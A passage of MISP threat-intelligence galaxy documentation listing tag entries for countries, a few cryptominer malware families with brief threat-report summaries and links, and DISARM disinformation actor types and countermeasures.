The tag is: misp-galaxy:cmtmf-attack-pattern="Identity Exploit"

Network Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Denial of Service"

Resource Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Resource Hijacking"

SLA Breach

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SLA Breach"

Customer Churn

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Customer Churn"

Country

Country meta information based on the database provided by geonames.org..

Country is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

geonames.org

andorra

Andorra

The tag is: misp-galaxy:country="andorra"

united arab emirates

United Arab Emirates

The tag is: misp-galaxy:country="united arab emirates"

afghanistan

Afghanistan

The tag is: misp-galaxy:country="afghanistan"

antigua and barbuda

Antigua and Barbuda

The tag is: misp-galaxy:country="antigua and barbuda"

anguilla

Anguilla

The tag is: misp-galaxy:country="anguilla"

albania

Albania

The tag is: misp-galaxy:country="albania"

armenia

Armenia

The tag is: misp-galaxy:country="armenia"

angola

Angola

The tag is: misp-galaxy:country="angola"

antarctica

Antarctica

The tag is: misp-galaxy:country="antarctica"

argentina

Argentina

The tag is: misp-galaxy:country="argentina"

american samoa

American Samoa

The tag is: misp-galaxy:country="american samoa"

austria

Austria

The tag is: misp-galaxy:country="austria"

australia

Australia

The tag is: misp-galaxy:country="australia"

aruba

Aruba

The tag is: misp-galaxy:country="aruba"

aland islands

Aland Islands

The tag is: misp-galaxy:country="aland islands"

azerbaijan

Azerbaijan

The tag is: misp-galaxy:country="azerbaijan"

bosnia and herzegovina

Bosnia and Herzegovina

The tag is: misp-galaxy:country="bosnia and herzegovina"

barbados

Barbados

The tag is: misp-galaxy:country="barbados"

bangladesh

Bangladesh

The tag is: misp-galaxy:country="bangladesh"

belgium

Belgium

The tag is: misp-galaxy:country="belgium"

burkina faso

Burkina Faso

The tag is: misp-galaxy:country="burkina faso"

bulgaria

Bulgaria

The tag is: misp-galaxy:country="bulgaria"

bahrain

Bahrain

The tag is: misp-galaxy:country="bahrain"

burundi

Burundi

The tag is: misp-galaxy:country="burundi"

benin

Benin

The tag is: misp-galaxy:country="benin"

saint barthelemy

Saint Barthelemy

The tag is: misp-galaxy:country="saint barthelemy"

bermuda

Bermuda

The tag is: misp-galaxy:country="bermuda"

brunei

Brunei

The tag is: misp-galaxy:country="brunei"

bolivia

Bolivia

The tag is: misp-galaxy:country="bolivia"

bonaire, saint eustatius and saba

Bonaire, Saint Eustatius and Saba

The tag is: misp-galaxy:country="bonaire, saint eustatius and saba "

brazil

Brazil

The tag is: misp-galaxy:country="brazil"

bahamas

Bahamas

The tag is: misp-galaxy:country="bahamas"

bhutan

Bhutan

The tag is: misp-galaxy:country="bhutan"

bouvet island

Bouvet Island

The tag is: misp-galaxy:country="bouvet island"

botswana

Botswana

The tag is: misp-galaxy:country="botswana"

belarus

Belarus

The tag is: misp-galaxy:country="belarus"

belize

Belize

The tag is: misp-galaxy:country="belize"

canada

Canada

The tag is: misp-galaxy:country="canada"

cocos islands

Cocos Islands

The tag is: misp-galaxy:country="cocos islands"

democratic republic of the congo

Democratic Republic of the Congo

The tag is: misp-galaxy:country="democratic republic of the congo"

central african republic

Central African Republic

The tag is: misp-galaxy:country="central african republic"

republic of the congo

Republic of the Congo

The tag is: misp-galaxy:country="republic of the congo"

switzerland

Switzerland

The tag is: misp-galaxy:country="switzerland"

ivory coast

Ivory Coast

The tag is: misp-galaxy:country="ivory coast"

cook islands

Cook Islands

The tag is: misp-galaxy:country="cook islands"

chile

Chile

The tag is: misp-galaxy:country="chile"

cameroon

Cameroon

The tag is: misp-galaxy:country="cameroon"

china

China

The tag is: misp-galaxy:country="china"

colombia

Colombia

The tag is: misp-galaxy:country="colombia"

costa rica

Costa Rica

The tag is: misp-galaxy:country="costa rica"

cuba

Cuba

The tag is: misp-galaxy:country="cuba"

cabo verde

Cabo Verde

The tag is: misp-galaxy:country="cabo verde"

curacao

Curacao

The tag is: misp-galaxy:country="curacao"

christmas island

Christmas Island

The tag is: misp-galaxy:country="christmas island"

cyprus

Cyprus

The tag is: misp-galaxy:country="cyprus"

czechia

Czechia

The tag is: misp-galaxy:country="czechia"

germany

Germany

The tag is: misp-galaxy:country="germany"

djibouti

Djibouti

The tag is: misp-galaxy:country="djibouti"

denmark

Denmark

The tag is: misp-galaxy:country="denmark"

dominica

Dominica

The tag is: misp-galaxy:country="dominica"

dominican republic

Dominican Republic

The tag is: misp-galaxy:country="dominican republic"

algeria

Algeria

The tag is: misp-galaxy:country="algeria"

ecuador

Ecuador

The tag is: misp-galaxy:country="ecuador"

estonia

Estonia

The tag is: misp-galaxy:country="estonia"

egypt

Egypt

The tag is: misp-galaxy:country="egypt"

western sahara

Western Sahara

The tag is: misp-galaxy:country="western sahara"

eritrea

Eritrea

The tag is: misp-galaxy:country="eritrea"

spain

Spain

The tag is: misp-galaxy:country="spain"

ethiopia

Ethiopia

The tag is: misp-galaxy:country="ethiopia"

finland

Finland

The tag is: misp-galaxy:country="finland"

fiji

Fiji

The tag is: misp-galaxy:country="fiji"

falkland islands

Falkland Islands

The tag is: misp-galaxy:country="falkland islands"

micronesia

Micronesia

The tag is: misp-galaxy:country="micronesia"

faroe islands

Faroe Islands

The tag is: misp-galaxy:country="faroe islands"

france

France

The tag is: misp-galaxy:country="france"

gabon

Gabon

The tag is: misp-galaxy:country="gabon"

united kingdom

United Kingdom

The tag is: misp-galaxy:country="united kingdom"

grenada

Grenada

The tag is: misp-galaxy:country="grenada"

georgia

Georgia

The tag is: misp-galaxy:country="georgia"

french guiana

French Guiana

The tag is: misp-galaxy:country="french guiana"

guernsey

Guernsey

The tag is: misp-galaxy:country="guernsey"

ghana

Ghana

The tag is: misp-galaxy:country="ghana"

gibraltar

Gibraltar

The tag is: misp-galaxy:country="gibraltar"

greenland

Greenland

The tag is: misp-galaxy:country="greenland"

gambia

Gambia

The tag is: misp-galaxy:country="gambia"

guinea

Guinea

The tag is: misp-galaxy:country="guinea"

guadeloupe

Guadeloupe

The tag is: misp-galaxy:country="guadeloupe"

equatorial guinea

Equatorial Guinea

The tag is: misp-galaxy:country="equatorial guinea"

greece

Greece

The tag is: misp-galaxy:country="greece"

south georgia and the south sandwich islands

South Georgia and the South Sandwich Islands

The tag is: misp-galaxy:country="south georgia and the south sandwich islands"

guatemala

Guatemala

The tag is: misp-galaxy:country="guatemala"

guam

Guam

The tag is: misp-galaxy:country="guam"

guinea-bissau

Guinea-Bissau

The tag is: misp-galaxy:country="guinea-bissau"

guyana

Guyana

The tag is: misp-galaxy:country="guyana"

hong kong

Hong Kong

The tag is: misp-galaxy:country="hong kong"

heard island and mcdonald islands

Heard Island and McDonald Islands

The tag is: misp-galaxy:country="heard island and mcdonald islands"

honduras

Honduras

The tag is: misp-galaxy:country="honduras"

croatia

Croatia

The tag is: misp-galaxy:country="croatia"

haiti

Haiti

The tag is: misp-galaxy:country="haiti"

hungary

Hungary

The tag is: misp-galaxy:country="hungary"

indonesia

Indonesia

The tag is: misp-galaxy:country="indonesia"

ireland

Ireland

The tag is: misp-galaxy:country="ireland"

israel

Israel

The tag is: misp-galaxy:country="israel"

isle of man

Isle of Man

The tag is: misp-galaxy:country="isle of man"

india

India

The tag is: misp-galaxy:country="india"

british indian ocean territory

British Indian Ocean Territory

The tag is: misp-galaxy:country="british indian ocean territory"

iraq

Iraq

The tag is: misp-galaxy:country="iraq"

iran

Iran

The tag is: misp-galaxy:country="iran"

iceland

Iceland

The tag is: misp-galaxy:country="iceland"

italy

Italy

The tag is: misp-galaxy:country="italy"

jersey

Jersey

The tag is: misp-galaxy:country="jersey"

jamaica

Jamaica

The tag is: misp-galaxy:country="jamaica"

jordan

Jordan

The tag is: misp-galaxy:country="jordan"

japan

Japan

The tag is: misp-galaxy:country="japan"

kenya

Kenya

The tag is: misp-galaxy:country="kenya"

kyrgyzstan

Kyrgyzstan

The tag is: misp-galaxy:country="kyrgyzstan"

cambodia

Cambodia

The tag is: misp-galaxy:country="cambodia"

kiribati

Kiribati

The tag is: misp-galaxy:country="kiribati"

comoros

Comoros

The tag is: misp-galaxy:country="comoros"

saint kitts and nevis

Saint Kitts and Nevis

The tag is: misp-galaxy:country="saint kitts and nevis"

north korea

North Korea

The tag is: misp-galaxy:country="north korea"

south korea

South Korea

The tag is: misp-galaxy:country="south korea"

kosovo

Kosovo

The tag is: misp-galaxy:country="kosovo"

kuwait

Kuwait

The tag is: misp-galaxy:country="kuwait"

cayman islands

Cayman Islands

The tag is: misp-galaxy:country="cayman islands"

kazakhstan

Kazakhstan

The tag is: misp-galaxy:country="kazakhstan"

laos

Laos

The tag is: misp-galaxy:country="laos"

lebanon

Lebanon

The tag is: misp-galaxy:country="lebanon"

saint lucia

Saint Lucia

The tag is: misp-galaxy:country="saint lucia"

liechtenstein

Liechtenstein

The tag is: misp-galaxy:country="liechtenstein"

sri lanka

Sri Lanka

The tag is: misp-galaxy:country="sri lanka"

liberia

Liberia

The tag is: misp-galaxy:country="liberia"

lesotho

Lesotho

The tag is: misp-galaxy:country="lesotho"

lithuania

Lithuania

The tag is: misp-galaxy:country="lithuania"

luxembourg

Luxembourg

The tag is: misp-galaxy:country="luxembourg"

latvia

Latvia

The tag is: misp-galaxy:country="latvia"

libya

Libya

The tag is: misp-galaxy:country="libya"

morocco

Morocco

The tag is: misp-galaxy:country="morocco"

monaco

Monaco

The tag is: misp-galaxy:country="monaco"

moldova

Moldova

The tag is: misp-galaxy:country="moldova"

montenegro

Montenegro

The tag is: misp-galaxy:country="montenegro"

saint martin

Saint Martin

The tag is: misp-galaxy:country="saint martin"

madagascar

Madagascar

The tag is: misp-galaxy:country="madagascar"

marshall islands

Marshall Islands

The tag is: misp-galaxy:country="marshall islands"

north macedonia

North Macedonia

The tag is: misp-galaxy:country="north macedonia"

mali

Mali

The tag is: misp-galaxy:country="mali"

myanmar

Myanmar

The tag is: misp-galaxy:country="myanmar"

mongolia

Mongolia

The tag is: misp-galaxy:country="mongolia"

macao

Macao

The tag is: misp-galaxy:country="macao"

northern mariana islands

Northern Mariana Islands

The tag is: misp-galaxy:country="northern mariana islands"

martinique

Martinique

The tag is: misp-galaxy:country="martinique"

mauritania

Mauritania

The tag is: misp-galaxy:country="mauritania"

montserrat

Montserrat

The tag is: misp-galaxy:country="montserrat"

malta

Malta

The tag is: misp-galaxy:country="malta"

mauritius

Mauritius

The tag is: misp-galaxy:country="mauritius"

maldives

Maldives

The tag is: misp-galaxy:country="maldives"

malawi

Malawi

The tag is: misp-galaxy:country="malawi"

mexico

Mexico

The tag is: misp-galaxy:country="mexico"

malaysia

Malaysia

The tag is: misp-galaxy:country="malaysia"

mozambique

Mozambique

The tag is: misp-galaxy:country="mozambique"

namibia

Namibia

The tag is: misp-galaxy:country="namibia"

new caledonia

New Caledonia

The tag is: misp-galaxy:country="new caledonia"

niger

Niger

The tag is: misp-galaxy:country="niger"

norfolk island

Norfolk Island

The tag is: misp-galaxy:country="norfolk island"

nigeria

Nigeria

The tag is: misp-galaxy:country="nigeria"

nicaragua

Nicaragua

The tag is: misp-galaxy:country="nicaragua"

netherlands

Netherlands

The tag is: misp-galaxy:country="netherlands"

norway

Norway

The tag is: misp-galaxy:country="norway"

nepal

Nepal

The tag is: misp-galaxy:country="nepal"

nauru

Nauru

The tag is: misp-galaxy:country="nauru"

niue

Niue

The tag is: misp-galaxy:country="niue"

new zealand

New Zealand

The tag is: misp-galaxy:country="new zealand"

oman

Oman

The tag is: misp-galaxy:country="oman"

panama

Panama

The tag is: misp-galaxy:country="panama"

peru

Peru

The tag is: misp-galaxy:country="peru"

french polynesia

French Polynesia

The tag is: misp-galaxy:country="french polynesia"

papua new guinea

Papua New Guinea

The tag is: misp-galaxy:country="papua new guinea"

philippines

Philippines

The tag is: misp-galaxy:country="philippines"

pakistan

Pakistan

The tag is: misp-galaxy:country="pakistan"

poland

Poland

The tag is: misp-galaxy:country="poland"

saint pierre and miquelon

Saint Pierre and Miquelon

The tag is: misp-galaxy:country="saint pierre and miquelon"

pitcairn

Pitcairn

The tag is: misp-galaxy:country="pitcairn"

puerto rico

Puerto Rico

The tag is: misp-galaxy:country="puerto rico"

palestinian territory

Palestinian Territory

The tag is: misp-galaxy:country="palestinian territory"

portugal

Portugal

The tag is: misp-galaxy:country="portugal"

palau

Palau

The tag is: misp-galaxy:country="palau"

paraguay

Paraguay

The tag is: misp-galaxy:country="paraguay"

qatar

Qatar

The tag is: misp-galaxy:country="qatar"

reunion

Reunion

The tag is: misp-galaxy:country="reunion"

romania

Romania

The tag is: misp-galaxy:country="romania"

serbia

Serbia

The tag is: misp-galaxy:country="serbia"

russia

Russia

The tag is: misp-galaxy:country="russia"

rwanda

Rwanda

The tag is: misp-galaxy:country="rwanda"

saudi arabia

Saudi Arabia

The tag is: misp-galaxy:country="saudi arabia"

solomon islands

Solomon Islands

The tag is: misp-galaxy:country="solomon islands"

seychelles

Seychelles

The tag is: misp-galaxy:country="seychelles"

sudan

Sudan

The tag is: misp-galaxy:country="sudan"

south sudan

South Sudan

The tag is: misp-galaxy:country="south sudan"

sweden

Sweden

The tag is: misp-galaxy:country="sweden"

singapore

Singapore

The tag is: misp-galaxy:country="singapore"

saint helena

Saint Helena

The tag is: misp-galaxy:country="saint helena"

slovenia

Slovenia

The tag is: misp-galaxy:country="slovenia"

svalbard and jan mayen

Svalbard and Jan Mayen

The tag is: misp-galaxy:country="svalbard and jan mayen"

slovakia

Slovakia

The tag is: misp-galaxy:country="slovakia"

sierra leone

Sierra Leone

The tag is: misp-galaxy:country="sierra leone"

san marino

San Marino

The tag is: misp-galaxy:country="san marino"

senegal

Senegal

The tag is: misp-galaxy:country="senegal"

somalia

Somalia

The tag is: misp-galaxy:country="somalia"

suriname

Suriname

The tag is: misp-galaxy:country="suriname"

sao tome and principe

Sao Tome and Principe

The tag is: misp-galaxy:country="sao tome and principe"

el salvador

El Salvador

The tag is: misp-galaxy:country="el salvador"

sint maarten

Sint Maarten

The tag is: misp-galaxy:country="sint maarten"

syria

Syria

The tag is: misp-galaxy:country="syria"

eswatini

Eswatini

The tag is: misp-galaxy:country="eswatini"

turks and caicos islands

Turks and Caicos Islands

The tag is: misp-galaxy:country="turks and caicos islands"

chad

Chad

The tag is: misp-galaxy:country="chad"

french southern territories

French Southern Territories

The tag is: misp-galaxy:country="french southern territories"

togo

Togo

The tag is: misp-galaxy:country="togo"

thailand

Thailand

The tag is: misp-galaxy:country="thailand"

tajikistan

Tajikistan

The tag is: misp-galaxy:country="tajikistan"

tokelau

Tokelau

The tag is: misp-galaxy:country="tokelau"

timor leste

Timor Leste

The tag is: misp-galaxy:country="timor leste"

turkmenistan

Turkmenistan

The tag is: misp-galaxy:country="turkmenistan"

tunisia

Tunisia

The tag is: misp-galaxy:country="tunisia"

tonga

Tonga

The tag is: misp-galaxy:country="tonga"

turkey

Turkey

The tag is: misp-galaxy:country="turkey"

trinidad and tobago

Trinidad and Tobago

The tag is: misp-galaxy:country="trinidad and tobago"

tuvalu

Tuvalu

The tag is: misp-galaxy:country="tuvalu"

taiwan

Taiwan

The tag is: misp-galaxy:country="taiwan"

tanzania

Tanzania

The tag is: misp-galaxy:country="tanzania"

ukraine

Ukraine

The tag is: misp-galaxy:country="ukraine"

uganda

Uganda

The tag is: misp-galaxy:country="uganda"

united states minor outlying islands

United States Minor Outlying Islands

The tag is: misp-galaxy:country="united states minor outlying islands"

united states of america

United States of America

The tag is: misp-galaxy:country="united states of america"

uruguay

Uruguay

The tag is: misp-galaxy:country="uruguay"

uzbekistan

Uzbekistan

The tag is: misp-galaxy:country="uzbekistan"

vatican

Vatican

The tag is: misp-galaxy:country="vatican"

saint vincent and the grenadines

Saint Vincent and the Grenadines

The tag is: misp-galaxy:country="saint vincent and the grenadines"

venezuela

Venezuela

The tag is: misp-galaxy:country="venezuela"

british virgin islands

British Virgin Islands

The tag is: misp-galaxy:country="british virgin islands"

u.s. virgin islands

U.S. Virgin Islands

The tag is: misp-galaxy:country="u.s. virgin islands"

vietnam

Vietnam

The tag is: misp-galaxy:country="vietnam"

vanuatu

Vanuatu

The tag is: misp-galaxy:country="vanuatu"

wallis and futuna

Wallis and Futuna

The tag is: misp-galaxy:country="wallis and futuna"

samoa

Samoa

The tag is: misp-galaxy:country="samoa"

yemen

Yemen

The tag is: misp-galaxy:country="yemen"

mayotte

Mayotte

The tag is: misp-galaxy:country="mayotte"

south africa

South Africa

The tag is: misp-galaxy:country="south africa"

zambia

Zambia

The tag is: misp-galaxy:country="zambia"

zimbabwe

Zimbabwe

The tag is: misp-galaxy:country="zimbabwe"

serbia and montenegro

Serbia and Montenegro

The tag is: misp-galaxy:country="serbia and montenegro"

netherlands antilles

Netherlands Antilles

The tag is: misp-galaxy:country="netherlands antilles"

Cryptominers

A list of cryptominer and cryptojacker malware..

Cryptominers is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Cisco Talos - raw-data

Lemon Duck

The infection starts with a PowerShell loading script, which is copied from other infected systems via SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue.

The tag is: misp-galaxy:cryptominers="Lemon Duck"

Lemon Duck is also known as:

Table 983. Table References

Links

https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html

https://success.trendmicro.com/solution/000261916

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/spam/3697/spammers-use-covid19-to-spread-lemon-duck-cryptominer

https://cyberflorida.org/threat-advisory/lemon-duck-cryptominer/

Blue Mockingbird Cryptominer

Blue Mockingbird Crypto miner is a crypto-mining payload within DLLs on Windows Systems.

The tag is: misp-galaxy:cryptominers="Blue Mockingbird Cryptominer"

Table 985. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Krane

The Krane malware uses SSH brute-force techniques to drop the XMRig cryptominer on the target to mine for the Hashvault pool.

The tag is: misp-galaxy:cryptominers="Krane"

Table 986. Table References

Links

https://cujo.com/threat-alert-krane-malware/

Hezb

“Hezb”, which is based on command line artifact data, was observed around Kinsing. This malware is relatively new and was recently reported in late May exploiting WSO2 RCE (CVE-2022-29464) in the wild. Several malware components were observed, the first of which was an XMRig miner installed as “Hezb”. Additional modules included a polkit exploit for privilege escalation as well as a zero-detection ELF payload named “kik”.

The tag is: misp-galaxy:cryptominers="Hezb"

Table 987. Table References

Links

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

Actor Types

DISARM is a framework designed for describing and understanding disinformation incidents..

Actor Types is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

data scientist

Person who can wrangle data, implement machine learning algorithms etc

The tag is: misp-galaxy:disarm-actortypes="data scientist"

Table 988. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A001.md

target

Person being targeted by disinformation campaign

The tag is: misp-galaxy:disarm-actortypes="target"

Table 989. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A002.md

trusted authority

Influencer

The tag is: misp-galaxy:disarm-actortypes="trusted authority"

Table 990. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A003.md

activist

The tag is: misp-galaxy:disarm-actortypes="activist"

Table 991. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A004.md

community group

The tag is: misp-galaxy:disarm-actortypes="community group"

Table 992. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A005.md

educator

The tag is: misp-galaxy:disarm-actortypes="educator"

Table 993. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A006.md

factchecker

Someone with the skills to verify whether information posted is factual

The tag is: misp-galaxy:disarm-actortypes="factchecker"

Table 994. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A007.md

library

The tag is: misp-galaxy:disarm-actortypes="library"

Table 995. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A008.md

NGO

The tag is: misp-galaxy:disarm-actortypes="NGO"

Table 996. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A009.md

religious organisation

The tag is: misp-galaxy:disarm-actortypes="religious organisation"

Table 997. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A010.md

school

The tag is: misp-galaxy:disarm-actortypes="school"

Table 998. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A011.md

account owner

Anyone who owns an account online

The tag is: misp-galaxy:disarm-actortypes="account owner"

Table 999. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A012.md

content creator

The tag is: misp-galaxy:disarm-actortypes="content creator"

Table 1000. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A013.md

elves

The tag is: misp-galaxy:disarm-actortypes="elves"

Table 1001. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A014.md

general public

The tag is: misp-galaxy:disarm-actortypes="general public"

Table 1002. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A015.md

influencer

The tag is: misp-galaxy:disarm-actortypes="influencer"

Table 1003. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A016.md

coordinating body

For example the DHS

The tag is: misp-galaxy:disarm-actortypes="coordinating body"

Table 1004. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A017.md

government

Government agencies

The tag is: misp-galaxy:disarm-actortypes="government"

Table 1005. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A018.md

military

The tag is: misp-galaxy:disarm-actortypes="military"

Table 1006. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A019.md

policy maker

The tag is: misp-galaxy:disarm-actortypes="policy maker"

Table 1007. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A020.md

media organisation

The tag is: misp-galaxy:disarm-actortypes="media organisation"

Table 1008. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A021.md

company

The tag is: misp-galaxy:disarm-actortypes="company"

Table 1009. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A022.md

adtech provider

The tag is: misp-galaxy:disarm-actortypes="adtech provider"

Table 1010. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A023.md

developer

The tag is: misp-galaxy:disarm-actortypes="developer"

Table 1011. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A024.md

funding_site_admin

Funding site admin

The tag is: misp-galaxy:disarm-actortypes="funding_site_admin"

Table 1012. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A025.md

games designer

The tag is: misp-galaxy:disarm-actortypes="games designer"

Table 1013. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A026.md

information security

The tag is: misp-galaxy:disarm-actortypes="information security"

Table 1014. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A027.md

platform administrator

The tag is: misp-galaxy:disarm-actortypes="platform administrator"

Table 1015. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A028.md

server admininistrator

The tag is: misp-galaxy:disarm-actortypes="server admininistrator"

Table 1016. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A029.md

platforms

The tag is: misp-galaxy:disarm-actortypes="platforms"

Table 1017. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A030.md

social media platform adminstrator

Person with the authority to make changes to algorithms, take down content etc.

The tag is: misp-galaxy:disarm-actortypes="social media platform adminstrator"

Table 1018. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A031.md

social media platform outreach

The tag is: misp-galaxy:disarm-actortypes="social media platform outreach"

Table 1019. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A032.md

social media platform owner

Person with authority to make changes to a social media company’s business model

The tag is: misp-galaxy:disarm-actortypes="social media platform owner"

Table 1020. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/actortypes/A033.md

Countermeasures

DISARM is a framework designed for describing and understanding disinformation incidents..

Countermeasures is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Charge for social media

Include a paid-for privacy option, e.g. pay Facebook for an option of them not collecting your personal information. There are examples of this not working, e.g. most people don’t use proton mail etc.

The tag is: misp-galaxy:disarm-countermeasures="Charge for social media"

Table 1021. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00006.md

Create shared fact-checking database

Share fact-checking resources - tips, responses, countermessages, across respose groups.

The tag is: misp-galaxy:disarm-countermeasures="Create shared fact-checking database"

Table 1022. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00008.md

Educate high profile influencers on best practices

Find online influencers. Provide training in the mechanisms of disinformation, how to spot campaigns, and/or how to contribute to responses by countermessaging, boosting information sites etc.

The tag is: misp-galaxy:disarm-countermeasures="Educate high profile influencers on best practices"

Table 1023. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00009.md

Enhanced privacy regulation for social media

Implement stronger privacy standards, to reduce the ability to microtarget community members.

The tag is: misp-galaxy:disarm-countermeasures="Enhanced privacy regulation for social media"

Table 1024. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00010.md

Media literacy. Games to identify fake news

Create and use games to show people the mechanics of disinformation, and how to counter them.

The tag is: misp-galaxy:disarm-countermeasures="Media literacy. Games to identify fake news"

Table 1025. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00011.md

Platform regulation

Empower existing regulators to govern social media. Also covers Destroy. Includes: Include the role of social media in the regulatory framework for media. The U.S. approach will need to be carefully crafted to protect First Amendment principles, create needed transparency, ensure liability, and impose costs for noncompliance. Includes Create policy that makes social media police disinformation. Includes: Use fraud legislation to clean up social media

The tag is: misp-galaxy:disarm-countermeasures="Platform regulation"

Table 1026. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00012.md

Rating framework for news

This is "strategic innoculation", raising the standards of what people expect in terms of evidence when consuming news. Example: journalistic ethics, or journalistic licencing body. Include full transcripts, link source, add items.

The tag is: misp-galaxy:disarm-countermeasures="Rating framework for news"

Table 1027. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00013.md

Real-time updates to fact-checking database

Update fact-checking databases and resources in real time. Especially import for time-limited events like natural disasters.

The tag is: misp-galaxy:disarm-countermeasures="Real-time updates to fact-checking database"

Table 1028. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00014.md

Censorship

Alter and/or block the publication/dissemination of information controlled by disinformation creators. Not recommended.

The tag is: misp-galaxy:disarm-countermeasures="Censorship"

Table 1029. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00016.md

Repair broken social connections

For example, use a media campaign to promote in-group to out-group in person communication / activities . Technique could be in terms of forcing a reality-check by talking to people instead of reading about bogeymen.

The tag is: misp-galaxy:disarm-countermeasures="Repair broken social connections"

Table 1030. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00017.md

Reduce effect of division-enablers

includes Promote constructive communication by shaming division-enablers, and Promote playbooks to call out division-enablers

The tag is: misp-galaxy:disarm-countermeasures="Reduce effect of division-enablers"

Table 1031. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00019.md

Encourage in-person communication

Encourage offline communication

The tag is: misp-galaxy:disarm-countermeasures="Encourage in-person communication"

Table 1032. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00021.md

Innoculate. Positive campaign to promote feeling of safety

Used to counter ability based and fear based attacks

The tag is: misp-galaxy:disarm-countermeasures="Innoculate. Positive campaign to promote feeling of safety"

Table 1033. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00022.md

Promote healthy narratives

Includes promoting constructive narratives i.e. not polarising (e.g. pro-life, pro-choice, pro-USA). Includes promoting identity neutral narratives.

The tag is: misp-galaxy:disarm-countermeasures="Promote healthy narratives"

Table 1034. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00024.md

Shore up democracy based messages

Messages about e.g. peace, freedom. And make it sexy. Includes Deploy Information and Narrative-Building in Service of Statecraft: Promote a narrative of transparency, truthfulness, liberal values, and democracy. Implement a compelling narrative via effective mechanisms of communication. Continually reassess messages, mechanisms, and audiences over time. Counteract efforts to manipulate media, undermine free markets, and suppress political freedoms via public diplomacy

The tag is: misp-galaxy:disarm-countermeasures="Shore up democracy based messages"

Table 1035. Table References

Links

